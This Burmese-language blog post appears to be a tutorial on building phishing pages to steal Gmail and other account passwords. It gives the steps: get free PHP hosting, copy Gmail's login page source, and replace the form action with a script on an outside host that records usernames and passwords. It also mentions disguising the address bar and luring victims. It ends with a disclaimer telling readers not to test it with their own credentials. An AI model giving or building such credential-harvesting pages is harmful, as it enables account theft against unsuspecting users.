Phishing ႏွင့္ ပတ္သတ္ျပီး
က်ေနာ္ Phishing ဆိုတဲ့ အေၾကာင္းကို သိသေလာက္ နည္းနည္းေျပာခ်င္ပါတယ္။ တကယ္ေတာ့ အဲဒီ Phishing ဆိုတာ လိမ္တဲ့ နည္းေလးတစ္ခုပါ။ သူမ်ားရဲ႕ Gmail account ပဲျဖစ္ျဖစ္၊ Yahoo account ပဲျဖစ္ျဖစ္၊ mediafire account ပဲျဖစ္ျဖစ္ မည္သည့္ အေကာင့္ ကိုမဆို လိမ္ညာကာ password
ယူလို႔ရေသာနည္းလမ္းျဖစ္ပါတယ္။ Phisher ဆုိတာ ကြန္ပ်ဴတာ အသုံးၿပဳသူတုိ႔ရဲ႕ Data Information ေတြကုိရယူရန္ ၿပဳလုပ္ထား အတုအေရာင္စာမ်က္ႏွာ (a fake login page) တစ္ခုသာလွ်င္ ၿဖစ္္ပါတယ္။ fake login page ေတြက Computer user ေတြရဲ႕ user name and password ေတြကုိ ဖုိင္တစ္ခုကေန၊ ဒါမွမဟုတ္ ေမးလ္ကုိ Direct ပုိ႔တဲ႔ နည္းလမ္းသုံးထားတာမ်ားပါတယ္... တစ္ခ်ဳိ႕ေတြက က်ယ္က်ယ္ၿပန္႔ၿပန္႔သုံးၾကပါတယ္.. သူ႔ရဲ႕အလုပ္လုပ္ပံုက ရိုးရွင္းပါတယ္။ free host, free domain, code script ( မိမိ hack ခ်င္တဲ့ site ရဲ႕ code ပါ ) ျပီးရင္ setting အနည္းငယ္ေလး ၀င္ျပင္ျပီးရင္ Hack လို႔ရပါျပီ။
php enabled ထားတဲ႔ web hosting တစ္ခုလုိပါတယ္... Phishing Attacker ေတြကေတာ့ free ရတဲ႔ webhosting မွာ account တစ္ခုဖြဲ႔ၿပီးသုံးေလ့ရွိပါတယ္... မိမိအသုံးၿပဳတဲ႔ mail services, ဆုိၾကပါဆုိ Gmail https://mail.google.com ကုိပဲသြားသြား, https://www.gmail.com ပဲ ၿဖစ္ၿဖစ္ ဖြင့္ကာ Ctrl + U သုိ႔မဟုတ္ Menu bar မွာ view>Page Source ကိုသြားကာ အကုန္လုံးကုိ Copy ကူးၿပီး text editor or web editor .. example : Dreamwaver ကဲ႔သုိ႔ Editor ထဲကုိ အကုန္လုံး paste လုပ္ယူလုိက္ပါ...
Code:
<form id="gaia_loginform" action="https://www.google.com/accounts/ServiceLoginAuth?service=mail" method="post" onSubmit="return(gaia_onLoginSubmit());">
ကုိ မိမိဖန္တီးထားတဲ႔ login page မွ data ေတြကုိ ရယူႏုိင္ေအာင္ သိမ္းဆည္းထားတဲ႔ login script file ကုိလမ္းညြန္ေပးရပါတယ္.. ဥပမာ..
Code:
<form action="http://www.planetcreator.net/tutorial/Fake Login/login.php" method="post">
(login.php ဆုိတာက fake login page က User ရုိက္ထည့္လုိက္ေသာ user name and password ကုိရယူတာပါ) အဲ႔လုိ ၿပင္ဆင္မူ႔ေတြလုပ္ၿပီး free hosting တစ္ခုမွာတင္... user ကုိ နည္းမ်ဳိးစုံနဲ႔ မိမိရဲ႕ ေထာင္ေၿခာက္ထဲကုိ အေရာက္သြင္းၾကတာပါ..........
ဒါက Fake Login Page ေတြရဲ႕ နမူနာပါ။ တကယ္တမ္း fake login ေတြက ဒီေလာက္နဲ႔ မလုံေလာက္ပါဘူး... Phishing Hacker ေတြက သူတုိ႔ရဲ႕ phisher ေတြကုိ နည္းလမ္းမ်ဳိးစုံနဲ႔ ၄င္းတုိ႔ရဲ႕ Victim ယုံၾကည္ေလာက္ေအာင္ ေသြးေဆာင္ၿဖားေယာင္း၊ ၿပီးေတာ့ attacker ဖန္တီးထားတဲ႔ page ကုိေရာက္ရင္ေတာင္မွ သာမာန္ user တစ္ေယာက္အတြက္ လုံး၀ (လုံး၀) မသိေအာင္ address bar / mouse down function ေတြကအစေပါ႔...စသည္..စသည္
၄င္း Fake Loign အားသြားေရာက္ စမ္းသပ္ရန္... စမ္းသပ္ရုံစမ္းသပ္ပါ... မိမိရဲ႕ gmail user name and password ကုိေယာင္လုိ႔ေတာင္ ရုိက္မထည့္လုိက္နဲ႔.... လုံး၀ တာ၀န္မယူ။
……………………………………………………………………………………………………………
0 comments:
Post a Comment